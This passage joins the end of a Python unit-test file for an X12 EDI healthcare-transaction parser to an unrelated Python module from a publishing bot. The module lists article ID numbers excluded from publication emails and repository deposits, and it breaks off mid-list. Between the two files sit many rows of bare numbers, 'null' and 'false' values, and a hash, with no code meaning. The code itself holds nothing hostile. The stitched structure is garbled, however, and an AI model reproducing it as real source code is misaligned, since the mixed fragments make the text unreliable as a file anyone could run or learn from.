'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000': 1,
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS': 1,
}
self.walker = walk_tree(initialCounts)
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('834.5010.X220.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
#self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2100B/N4')
self.node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
self.assertNotEqual(self.node, None)
#self.node.parent.cur_count = 1 # Loop 2000
#self.node.cur_count = 1 # INS
def test_ord_ok1(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('REF*0F*1234~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('REF*1L*91234~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_ord_ok2(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('REF*0F*1234~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('REF*17*A232~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_ord_ok3(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('REF*17*1234~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('REF*0F*A232~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_ord_bad1(self):
self.errh.reset()
node = self.node
seg_data = sift_pyx12.segment.Segment('REF*0F*1234~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('DTP*297*D8*20040101~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('REF*17*A232~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(self.errh.err_cde, '1', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_lui_ok(self):
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1')
#node.parent.cur_count = 1 # Loop 2100A
#node.cur_count = 1 # NM1
self.walker.setCountState({
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A': 1,
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1': 1,
})
self.assertNotEqual(node, None)
seg_data = sift_pyx12.segment.Segment('LUI***ES~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
class LoopPathPopPush837(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
param = sift_pyx12.params.params()
self.errh = sift_pyx12.error_handler.errh_null()
self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
def test_path_sub_loop(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/HI')
seg_data = sift_pyx12.segment.Segment(
'NM1*82*2*Provider Name*****XX*24423423~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2310B'])
def test_path_up3(self):
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400/2430/SVD')
seg_data = sift_pyx12.segment.Segment('LX*2', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['2430', '2400'])
self.assertEqual(get_id_list(push), ['2400'])
class LoopPathPopPush834(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('834.5010.X220.A1.xml', param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_path_same_repeat(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
seg_data = sift_pyx12.segment.Segment('INS*Y*18*030*20*A', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['2000'])
self.assertEqual(get_id_list(push), ['2000'])
def test_path_in(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
seg_data = sift_pyx12.segment.Segment('DTP*356*D8*20080101', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
def test_path_repeat(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/DTP')
seg_data = sift_pyx12.segment.Segment('INS*Y*18*030*20*A', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), ['2000'])
self.assertEqual(get_id_list(push), ['2000'])
def test_path_up(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100A/NM1')
seg_data = sift_pyx12.segment.Segment('ST*834*11', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(
get_id_list(pop), ['2100A', '2000', 'DETAIL', 'ST_LOOP'])
self.assertEqual(get_id_list(push), ['ST_LOOP'])
def test_path_up2(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
seg_data = sift_pyx12.segment.Segment('GS*BE*AAA*BBB*20081116*2044*328190001*X*004010X095A1', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(
pop), ['2000', 'DETAIL', 'ST_LOOP', 'GS_LOOP'])
self.assertEqual(get_id_list(push), ['GS_LOOP'])
def test_path_in2(self):
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/INS')
seg_data = sift_pyx12.segment.Segment('DTP*356*D8*20080203', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), [])
class Bug837i(unittest.TestCase):
def setUp(self):
self.walker = walk_tree()
self.param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file('837Q3.I.5010.X223.A1.xml', self.param)
self.errh = sift_pyx12.error_handler.errh_null()
def testWalk2420A(self):
mpath = '/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2300/2400'
node = self.map.getnodebypath(mpath)
self.assertNotEqual(node, None, 'Path %s not found' % (mpath))
#start_node = node
self.assertEqual(node.base_name, 'loop')
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('NM1*72*1*TEST*USER****XX*9107999999~', '~', '*', ':')
#self.errh.reset()
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
#self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2420A'])
#self.assertEqual(traverse_path(start_node, pop, push), pop_to_parent_loop(node).get_path())
def tearDown(self):
del self.errh
del self.map
del self.walker
| 42.77093
| 116
| 0.618791
| 4,992
| 36,783
| 4.354567
| 0.061899
| 0.120066
| 0.04016
| 0.088325
| 0.895989
| 0.881728
| 0.865949
| 0.846766
| 0.821235
| 0.794645
| 0
| 0.051353
| 0.227605
| 36,783
| 859
| 117
| 42.820722
| 0.713773
| 0.050132
| 0
| 0.727007
| 0
| 0
| 0.114231
| 0.067801
| 0
| 0
| 0
| 0
| 0.332847
| 1
| 0.086131
| false
| 0
| 0.010219
| 0
| 0.112409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
505c0134c92337c1c6516a76ae59979c8b898bcd
| 37,362
|
py
|
Python
|
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
provider/blacklist.py
|
gnott/elife-bot
|
584c315d15d1289e0d2c27c28aaaae31174812e4
|
[
"MIT"
] | null | null | null |
"""Blacklist particular articles from doing particular activities"""
def publication_email_article_do_not_send_list():
"""
Return list of do not send article DOI id
"""
do_not_send_list = [
"00003", "00005", "00007", "00011", "00012", "00013", "00031", "00036", "00047", "00048",
"00049", "00051", "00065", "00067", "00068", "00070", "00078", "00090", "00093", "00102",
"00105", "00109", "00116", "00117", "00133", "00160", "00170", "00171", "00173", "00178",
"00181", "00183", "00184", "00190", "00205", "00218", "00220", "00230", "00231", "00240",
"00242", "00243", "00247", "00248", "00260", "00269", "00270", "00278", "00281", "00286",
"00288", "00290", "00291", "00299", "00301", "00302", "00306", "00308", "00311", "00312",
"00321", "00324", "00326", "00327", "00329", "00333", "00334", "00336", "00337", "00340",
"00347", "00348", "00351", "00352", "00353", "00354", "00358", "00362", "00365", "00367",
"00378", "00380", "00385", "00386", "00387", "00400", "00411", "00415", "00421", "00422",
"00425", "00426", "00429", "00435", "00444", "00450", "00452", "00458", "00459", "00461",
"00467", "00471", "00473", "00475", "00476", "00477", "00481", "00482", "00488", "00491",
"00498", "00499", "00505", "00508", "00515", "00518", "00522", "00523", "00533", "00534",
"00537", "00542", "00558", "00563", "00565", "00569", "00571", "00572", "00573", "00577",
"00590", "00592", "00593", "00594", "00603", "00605", "00615", "00625", "00626", "00631",
"00632", "00633", "00638", "00639", "00640", "00641", "00642", "00646", "00647", "00648",
"00654", "00655", "00658", "00659", "00662", "00663", "00666", "00668", "00669", "00672",
"00675", "00676", "00683", "00691", "00692", "00699", "00704", "00708", "00710", "00712",
"00723", "00726", "00729", "00731", "00736", "00744", "00745", "00747", "00750", "00757",
"00759", "00762", "00767", "00768", "00772", "00776", "00778", "00780", "00782", "00785",
"00790", "00791", "00792", "00799", "00800", "00801", "00802", "00804", "00806", "00808",
"00813", "00822", "00824", "00825", "00828", "00829", "00842", "00844", "00845", "00855",
"00856", "00857", "00861", "00862", "00863", "00866", "00868", "00873", "00882", "00884",
"00886", "00895", "00899", "00903", "00905", "00914", "00924", "00926", "00932", "00933",
"00940", "00943", "00947", "00948", "00951", "00953", "00954", "00958", "00960", "00961",
"00963", "00966", "00967", "00969", "00971", "00983", "00992", "00994", "00996", "00999",
"01004", "01008", "01009", "01020", "01029", "01030", "01042", "01045", "01061", "01064",
"01067", "01071", "01074", "01084", "01085", "01086", "01089", "01096", "01098", "01102",
"01104", "01108", "01114", "01115", "01119", "01120", "01123", "01127", "01133", "01135",
"01136", "01138", "01139", "01140", "01149", "01157", "01159", "01160", "01169", "01179",
"01180", "01197", "01201", "01202", "01206", "01211", "01213", "01214", "01221", "01222",
"01228", "01229", "01233", "01234", "01236", "01239", "01252", "01256", "01257", "01267",
"01270", "01273", "01279", "01287", "01289", "01291", "01293", "01294", "01295", "01296",
"01298", "01299", "01305", "01308", "01310", "01311", "01312", "01319", "01322", "01323",
"01326", "01328", "01339", "01340", "01341", "01345", "01350", "01355", "01369", "01370",
"01374", "01381", "01385", "01386", "01387", "01388", "01402", "01403", "01412", "01414",
"01426", "01428", "01433", "01434", "01438", "01439", "01440", "01456", "01457", "01460",
"01462", "01465", "01469", "01473", "01479", "01481", "01482", "01483", "01488", "01489",
"01494", "01496", "01498", "01501", "01503", "01514", "01515", "01516", "01519", "01524",
"01530", "01535", "01539", "01541", "01557", "01561", "01566", "01567", "01569", "01574",
"01579", "01581", "01584", "01587", "01596", "01597", "01599", "01603", "01604", "01605",
"01607", "01608", "01610", "01612", "01621", "01623", "01630", "01632", "01633", "01637",
"01641", "01658", "01659", "01662", "01663", "01671", "01680", "01681", "01684", "01694",
"01695", "01699", "01700", "01710", "01715", "01724", "01730", "01738", "01739", "01741",
"01749", "01751", "01754", "01760", "01763", "01775", "01776", "01779", "01808", "01809",
"01812", "01816", "01817", "01820", "01828", "01831", "01832", "01833", "01834", "01839",
"01845", "01846", "01849", "01856", "01857", "01861", "01867", "01873", "01879", "01883",
"01888", "01892", "01893", "01901", "01906", "01911", "01913", "01914", "01916", "01917",
"01926", "01928", "01936", "01939", "01944", "01948", "01949", "01958", "01963", "01964",
"01967", "01968", "01977", "01979", "01982", "01990", "01993", "01998", "02001", "02008",
"02009", "02020", "02024", "02025", "02028", "02030", "02040", "02041", "02042", "02043",
"02046", "02053", "02057", "02061", "02062", "02069", "02076", "02077", "02078", "02087",
"02088", "02094", "02104", "02105", "02109", "02112", "02115", "02130", "02131", "02137",
"02148", "02151", "02152", "02164", "02171", "02172", "02181", "02184", "02189", "02190",
"02196", "02199", "02200", "02203", "02206", "02208", "02217", "02218", "02224", "02230",
"02236", "02238", "02242", "02245", "02252", "02257", "02260", "02265", "02270", "02272",
"02273", "02277", "02283", "02286", "02289", "02304", "02313", "02322", "02324", "02349",
"02362", "02365", "02369", "02370", "02372", "02375", "02384", "02386", "02387", "02391",
"02394", "02395", "02397", "02403", "02407", "02409", "02419", "02439", "02440", "02443",
"02444", "02445", "02450", "02451", "02475", "02478", "02481", "02482", "02490", "02501",
"02504", "02510", "02511", "02515", "02516", "02517", "02523", "02525", "02531", "02535",
"02536", "02555", "02557", "02559", "02564", "02565", "02576", "02583", "02589", "02590",
"02598", "02615", "02618", "02619", "02626", "02630", "02634", "02637", "02641", "02653",
"02658", "02663", "02667", "02669", "02670", "02671", "02674", "02676", "02678", "02687",
"02715", "02725", "02726", "02730", "02734", "02736", "02740", "02743", "02747", "02750",
"02755", "02758", "02763", "02772", "02777", "02780", "02784", "02786", "02791", "02792",
"02798", "02805", "02809", "02811", "02812", "02813", "02833", "02839", "02840", "02844",
"02848", "02851", "02854", "02860", "02862", "02863", "02866", "02872", "02875", "02882",
"02893", "02897", "02904", "02907", "02910", "02917", "02923", "02935", "02938", "02945",
"02949", "02950", "02951", "02956", "02963", "02964", "02975", "02978", "02981", "02993",
"02996", "02999", "03005", "03007", "03011", "03023", "03025", "03031", "03032", "03035",
"03043", "03058", "03061", "03068", "03069", "03075", "03077", "03080", "03083", "03091",
"03100", "03104", "03110", "03115", "03116", "03125", "03126", "03128", "03145", "03146",
"03159", "03164", "03176", "03178", "03180", "03185", "03191", "03197", "03198", "03205",
"03206", "03222", "03229", "03233", "03235", "03239", "03245", "03251", "03254", "03255",
"03271", "03273", "03275", "03282", "03285", "03293", "03297", "03300", "03307", "03311",
"03318", "03342", "03346", "03348", "03351", "03357", "03363", "03371", "03372", "03374",
"03375", "03383", "03385", "03397", "03398", "03399", "03401", "03405", "03406", "03416",
"03421", "03422", "03427", "03430", "03433", "03435", "03440", "03443", "03464", "03467",
"03468", "03473", "03475", "03476", "03487", "03496", "03497", "03498", "03502", "03504",
"03521", "03522", "03523", "03526", "03528", "03532", "03542", "03545", "03549", "03553",
"03558", "03563", "03564", "03568", "03573", "03574", "03575", "03579", "03581", "03582",
"03583", "03587", "03596", "03600", "03602", "03604", "03606", "03609", "03613", "03626",
"03635", "03638", "03640", "03641", "03648", "03650", "03653", "03656", "03658", "03663",
"03665", "03671", "03674", "03676", "03678", "03679", "03680", "03683", "03695", "03696",
"03697", "03701", "03702", "03703", "03706", "03711", "03714", "03720", "03722", "03724",
"03726", "03727", "03728", "03735", "03737", "03743", "03751", "03753", "03754", "03756",
"03764", "03765", "03766", "03772", "03778", "03779", "03781", "03785", "03790", "03804",
"03811", "03819", "03821", "03830", "03842", "03848", "03851", "03868", "03881", "03883",
"03891", "03892", "03895", "03896", "03908", "03915", "03925", "03939", "03941", "03943",
"03949", "03952", "03962", "03970", "03971", "03977", "03978", "03980", "03981", "03997",
"04000", "04006", "04008", "04014", "04024", "04034", "04037", "04040", "04046", "04047",
"04057", "04059", "04066", "04069", "04070", "04094", "04105", "04106", "04111", "04114",
"04120", "04121", "04123", "04126", "04132", "04135", "04137", "04147", "04158", "04165",
"04168", "04177", "04180", "04187", "04193", "04205", "04207", "04220", "04234", "04235",
"04236", "04246", "04247", "04249", "04251", "04263", "04265", "04266", "04273", "04279",
"04287", "04288", "04300", "04316", "04333", "04353", "04363", "04366", "04371", "04378",
"04380", "04387", "04389", "04390", "04395", "04402", "04406", "04415", "04418", "04433",
"04437", "04449", "04476", "04478", "04489", "04491", "04494", "04499", "04501", "04506",
"04517", "04525", "04530", "04531", "04534", "04543", "04551", "04553", "04563", "04565",
"04577", "04580", "04581", "04586", "04591", "04600", "04601", "04603", "04605", "04617",
"04629", "04630", "04631", "04645", "04660", "04664", "04686", "04692", "04693", "04711",
"04729", "04741", "04742", "04766", "04775", "04779", "04785", "04801", "04806", "04811",
"04851", "04854", "04869", "04875", "04876", "04878", "04885", "04889", "04901", "04902",
"04909", "04919", "04969", "04970", "04986", "04995", "04996", "04997", "04998", "05000",
"05007", "05025", "05031", "05033", "05041", "05048", "05055", "05060", "05075", "05087",
"05105", "05115", "05116", "05125", "05151", "05161", "05169", "05178", "05179", "05198",
"05216", "05218", "05244", "05256", "05259", "05269", "05289", "05290", "05334", "05352",
"05375", "05377", "05394", "05401", "05418", "05419", "05422", "05427", "05438", "05490",
"05504", "05508", "05553", "05558", "05564", "05570", "05580", "05597", "05614", "05657",
"05663", "05720", "05770", "05787", "05789", "05816", "05846", "05896", "05983", "06156",
"06193", "06200", "06235", "06303", "06306", "06351", "06424", "06430", "06453", "06494",
"06656", "06720", "06740", "06900", "06986"]
# More do not send circa July 2015
# Do not send email if they are revised, since the duplicate check will not
# trigger since they were not sent in the first place
do_not_send_list = do_not_send_list + ["04186", "06416", "06847", "06938", "06959", "07072"]
return do_not_send_list
def pub_router_deposit_article_blacklist(workflow):
"""
Return list of do not send article DOI id
"""
if workflow == "HEFCE":
article_blacklist = [
"00003", "00005", "00007", "00011", "00013",
"00031", "00047", "00048", "00049", "00051",
"00065", "00067", "00068", "00070", "00078",
"00090", "00093", "00102", "00109", "00117",
"00171", "00173", "00181", "00184", "00205",
"00240", "00242", "00243", "00248", "00270",
"00281", "00286", "00301", "00302", "00311",
"00326", "00340", "00347", "00351", "00352",
"00353", "00365", "00385", "00386", "00387",
"00475", "00012", "00036", "00105", "00116",
"00133", "00160", "00170", "00178", "00183",
"00190", "00218", "00220", "00230", "00231",
"00247", "00260", "00269", "00278", "00288",
"00290", "00291", "00299", "00306", "00308",
"00312", "00321", "00324", "00327", "00329",
"00333", "00334", "00336", "00337", "00348",
"00354", "00358", "00362", "00367", "00378",
"00380", "00400", "00411", "00415", "00421",
"00422", "00425", "00426", "00429", "00435",
"00444", "00450", "00452", "00458", "00459",
"00461", "00467", "00471", "00473", "00476",
"00477", "00481", "00482", "00488", "00491",
"00498", "00499", "00505", "00508", "00515",
"00518", "00522", "00523", "00533", "00534",
"00537", "00542", "00558", "00563", "00565",
"00569", "00571", "00572", "00573", "00577",
"00592", "00593", "00594", "00603", "00605",
"00615", "00625", "00626", "00631", "00632",
"00633", "00638", "00639", "00640", "00641",
"00642", "00646", "00647", "00648", "00654",
"00655", "00658", "00659", "00663", "00666",
"00668", "00669", "00672", "00675", "00676",
"00683", "00691", "00692", "00699", "00704",
"00708", "00710", "00712", "00723", "00726",
"00729", "00731", "00736", "00744", "00745",
"00747", "00750", "00757", "00759", "00762",
"00767", "00768", "00772", "00776", "00778",
"00780", "00782", "00785", "00790", "00791",
"00792", "00799", "00800", "00801", "00802",
"00804", "00806", "00808", "00813", "00822",
"00824", "00825", "00828", "00842", "00844",
"00845", "00855", "00856", "00857", "00861",
"00862", "00863", "00866", "00868", "00873",
"00882", "00884", "00886", "00895", "00899",
"00903", "00905", "00914", "00924", "00926",
"00932", "00933", "00940", "00943", "00947",
"00948", "00951", "00953", "00954", "00958",
"00960", "00961", "00963", "00966", "00967",
"00969", "00971", "00983", "00992", "00994",
"00996", "00999", "01004", "01008", "01009",
"01020", "01029", "01030", "01042", "01045",
"01061", "01064", "01067", "01071", "01074",
"01084", "01085", "01086", "01089", "01096",
"01098", "01102", "01104", "01108", "01114",
"01115", "01119", "01120", "01123", "01127",
"01133", "01135", "01136", "01138", "01139",
"01140", "01149", "01157", "01159", "01160",
"01169", "01179", "01180", "01197", "01202",
"01206", "01211", "01213", "01214", "01221",
"01222", "01228", "01229", "01233", "01234",
"01236", "01252", "01256", "01270", "01273",
"01279", "01287", "01289", "01291", "01293",
"01294", "01295", "01296", "01298", "01299",
"01305", "01312", "01319", "01323", "01326",
"01328", "01339", "01340", "01341", "01345",
"01350", "01387", "01388", "01402", "01403",
"01414", "01426", "01428", "01456", "01462",
"01469", "01482", "01494", "01501", "01503",
"01514", "01515", "01516", "01519", "01541",
"01557", "01561", "01574", "01587", "01597",
"01599", "01605", "01608", "01633", "01658",
"01662", "01663", "01680", "01700", "01710",
"01738", "01749", "01760", "01779", "01809",
"01816", "01820", "01839", "01845", "01873",
"01893", "01926", "01968", "01979", "02094",
"00590", "00662", "00829", "01201", "01239",
"01257", "01267", "01308", "01310", "01311",
"01322", "01355", "01369", "01370", "01374",
"01381", "01385", "01386", "01412", "01433",
"01434", "01438", "01439", "01440", "01457",
"01460", "01465", "01473", "01479", "01481",
"01483", "01488", "01489", "01496", "01498",
"01524", "01530", "01535", "01539", "01566",
"01567", "01569", "01579", "01581", "01584",
"01596", "01603", "01604", "01607", "01610",
"01612", "01621", "01623", "01630", "01632",
"01637", "01641", "01659", "01671", "01681",
"01684", "01694", "01695", "01699", "01715",
"01724", "01730", "01739", "01741", "01751",
"01754", "01763", "01775", "01776", "01808",
"01812", "01817", "01828", "01831", "01832",
"01833", "01834", "01846", "01849", "01856",
"01857", "01861", "01867", "01879", "01883",
"01888", "01892", "01901", "01906", "01911",
"01913", "01914", "01916", "01917", "01928",
"01936", "01939", "01944", "01948", "01949",
"01958", "01963", "01964", "01967", "01977",
"01982", "01990", "01993", "01998", "02001",
"02008", "02009", "02020", "02024", "02025",
"02028", "02030", "02040", "02041", "02042",
"02043", "02046", "02053", "02057", "02061",
"02062", "02069", "02076", "02077", "02078",
"02087", "02088", "02104", "02105", "02109",
"02112", "02115", "02130", "02131", "02137",
"02148", "02151", "02152", "02164", "02171",
"02172", "02181", "02184", "02189", "02190",
"02196", "02199", "02200", "02203", "02206",
"02208", "02217", "02218", "02224", "02230",
"02236", "02238", "02242", "02245", "02252",
"02257", "02260", "02265", "02270", "02272",
"02273", "02277", "02283", "02286", "02289",
"02304", "02313", "02322", "02324", "02349",
"02362", "02365", "02369", "02370", "02372",
"02375", "02384", "02386", "02387", "02391",
"02394", "02395", "02397", "02403", "02407",
"02409", "02419", "02439", "02440", "02443",
"02444", "02445", "02450", "02451", "02475",
"02478", "02481", "02482", "02490", "02501",
"02504", "02510", "02511", "02515", "02516",
"02517", "02523", "02525", "02531", "02535",
"02536", "02555", "02557", "02559", "02564",
"02565", "02576", "02583", "02589", "02590",
"02598", "02615", "02618", "02619", "02626",
"02630", "02634", "02637", "02641", "02653",
"02658", "02663", "02667", "02669", "02670",
"02671", "02674", "02676", "02678", "02687",
"02715", "02725", "02726", "02730", "02734",
"02736", "02740", "02743", "02747", "02750",
"02755", "02758", "02763", "02772", "02777",
"02780", "02784", "02786", "02791", "02792",
"02798", "02805", "02809", "02811", "02812",
"02813", "02833", "02839", "02840", "02844",
"02848", "02851", "02854", "02860", "02862",
"02863", "02866", "02869", "02872", "02875",
"02882", "02893", "02897", "02904", "02907",
"02910", "02917", "02923", "02935", "02938",
"02945", "02949", "02950", "02951", "02956",
"02963", "02964", "02975", "02978", "02981",
"02993", "02996", "02999", "03005", "03007",
"03011", "03023", "03025", "03031", "03032",
"03035", "03043", "03058", "03061", "03068",
"03069", "03075", "03077", "03080", "03083",
"03091", "03100", "03104", "03110", "03115",
"03116", "03125", "03126", "03128", "03145",
"03146", "03159", "03164", "03176", "03178",
"03180", "03185", "03191", "03197", "03198",
"03205", "03206", "03222", "03229", "03233",
"03235", "03239", "03245", "03251", "03254",
"03255", "03271", "03273", "03275", "03282",
"03285", "03293", "03297", "03300", "03307",
"03311", "03318", "03342", "03346", "03348",
"03351", "03357", "03363", "03371", "03372",
"03374", "03375", "03383", "03385", "03397",
"03398", "03399", "03401", "03405", "03406",
"03416", "03421", "03422", "03427", "03430",
"03433", "03435", "03440", "03443", "03445",
"03464", "03467", "03468", "03473", "03475",
"03476", "03487", "03496", "03497", "03498",
"03502", "03504", "03521", "03522", "03523",
"03526", "03528", "03532", "03542", "03545",
"03549", "03553", "03558", "03563", "03564",
"03568", "03573", "03574", "03575", "03579",
"03581", "03582", "03583", "03587", "03596",
"03600", "03602", "03604", "03606", "03609",
"03613", "03626", "03635", "03638", "03640",
"03641", "03648", "03650", "03653", "03656",
"03658", "03663", "03665", "03671", "03674",
"03676", "03678", "03679", "03680", "03683",
"03695", "03696", "03697", "03701", "03702",
"03703", "03706", "03711", "03714", "03720",
"03722", "03724", "03726", "03727", "03728",
"03735", "03737", "03743", "03751", "03753",
"03754", "03756", "03764", "03765", "03766",
"03772", "03778", "03779", "03781", "03785",
"03790", "03804", "03811", "03819", "03821",
"03830", "03842", "03848", "03851", "03868",
"03881", "03883", "03891", "03892", "03895",
"03896", "03908", "03915", "03925", "03939",
"03941", "03943", "03949", "03952", "03962",
"03970", "03971", "03977", "03978", "03980",
"03981", "03997", "04000", "04006", "04008",
"04014", "04024", "04034", "04037", "04040",
"04046", "04047", "04057", "04059", "04066",
"04069", "04070", "04094", "04105", "04106",
"04111", "04114", "04120", "04121", "04123",
"04126", "04132", "04135", "04137", "04147",
"04158", "04165", "04168", "04177", "04180",
"04187", "04193", "04205", "04207", "04220",
"04234", "04235", "04236", "04246", "04247",
"04249", "04251", "04263", "04265", "04266",
"04273", "04279", "04287", "04288", "04300",
"04316", "04333", "04353", "04363", "04366",
"04371", "04378", "04380", "04387", "04389",
"04390", "04395", "04402", "04406", "04407",
"04415", "04418", "04433", "04437", "04449",
"04476", "04478", "04489", "04491", "04494",
"04499", "04501", "04506", "04517", "04525",
"04530", "04531", "04534", "04543", "04551",
"04553", "04563", "04565", "04577", "04580",
"04581", "04586", "04591", "04600", "04601",
"04603", "04605", "04617", "04629", "04630",
"04631", "04645", "04660", "04664", "04686",
"04692", "04693", "04711", "04729", "04741",
"04742", "04766", "04775", "04779", "04785",
"04801", "04806", "04811", "04851", "04854",
"04869", "04875", "04876", "04878", "04885",
"04889", "04901", "04902", "04909", "04919",
